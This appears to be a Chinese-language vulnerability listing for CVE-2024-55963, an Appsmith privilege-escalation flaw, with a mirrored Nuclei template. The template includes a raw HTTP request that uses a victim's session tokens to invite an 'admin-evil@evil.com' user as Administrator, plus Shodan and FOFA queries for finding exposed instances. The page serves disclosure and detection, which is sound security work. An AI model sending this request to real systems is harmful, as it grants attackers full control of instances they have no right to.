Appsmith 权限提升漏洞

漏洞信息

漏洞名称: Appsmith 权限提升漏洞

漏洞编号:

  • CVE: CVE-2024-55963

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: Appsmith是一款开源的低代码平台,允许用户快速构建内部工具和应用程序。它广泛应用于企业环境中,用于创建和管理各种业务应用。由于其易用性和灵活性,Appsmith在许多组织中扮演着重要角色。该平台的一个漏洞存在于/api/v1/users/invite端点,允许经过身份验证的用户通过发送特制请求来邀请新用户并赋予其管理员权限。这一漏洞的根本原因在于访问控制机制的缺陷,使得攻击者能够绕过预期的权限限制。这种权限提升漏洞可能导致攻击者完全控制Appsmith实例,从而执行任意操作,包括访问敏感数据、修改应用程序逻辑或进一步利用系统资源。攻击者需要具备有效的身份验证凭证才能利用此漏洞,但一旦成功,其影响范围广泛且严重。建议用户立即升级到Appsmith 1.51.0或更高版本以修复此漏洞。

产品厂商: appsmith

产品名称: appsmith

影响版本: version < 1.51.0

搜索语法: title=”appsmith”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/1a54be3037b147110534cc8051d66db220f3a867/http%2Fcves%2F2024%2FCVE-2024-55963.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

id: CVE-2024-55963

info:
name: Appsmith - Privilege Escalation
author: saikir4n
severity: high
description: Appsmith contains a privilege escalation vulnerability via the /api/v1/users/invite endpoint that allows an authenticated user to invite a user as Administrator, indicating broken access control.
impact: |
An authenticated attacker can escalate privileges to Administrator level, gaining full control over the Appsmith instance.
remediation: |
Update Appsmith to version 1.51.0 or later to fix this privilege escalation vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-55963
- https://github.com/appsmithorg/appsmith/security/advisories/GHSA-jxh3-4vp2-vhjx
- https://rhinosecuritylabs.com/research/cve-2024-55963-appsmith-rce/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-55963
cwe-id: CWE-269
metadata:
verified: true
max-request: 1
vendor: appsmith
product: appsmith
shodan-query: http.title:"appsmith"
fofa-query: title="appsmith"
tags: cve,cve2024,appsmith,privilege-escalation

http:
- raw:
- |
POST /api/v1/users/invite HTTP/1.1
Host: {{Hostname}}
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/applications
Content-Type: application/json
X-XSRF-TOKEN: {{xsrf_token}}
Cookie: XSRF-TOKEN={{xsrf_token}}; SESSION={{session_id}}
Content-Length: 107

{
"email": "admin-evil@evil.com",
"usernames": ["admin-evil"],
"roleNames": ["Administrator"]
}

attack: pitchfork
payloads:
xsrf_token:
- REPLACE_XSRF_TOKEN
session_id:
- REPLACE_SESSION_ID

matchers:
- type: status
status:
- 200
- 201

matchers-condition: and



Appsmith 权限提升漏洞
http://example.com/2025/07/19/github_3971263777/
作者
lianccc
发布于
2025年7月19日
许可协议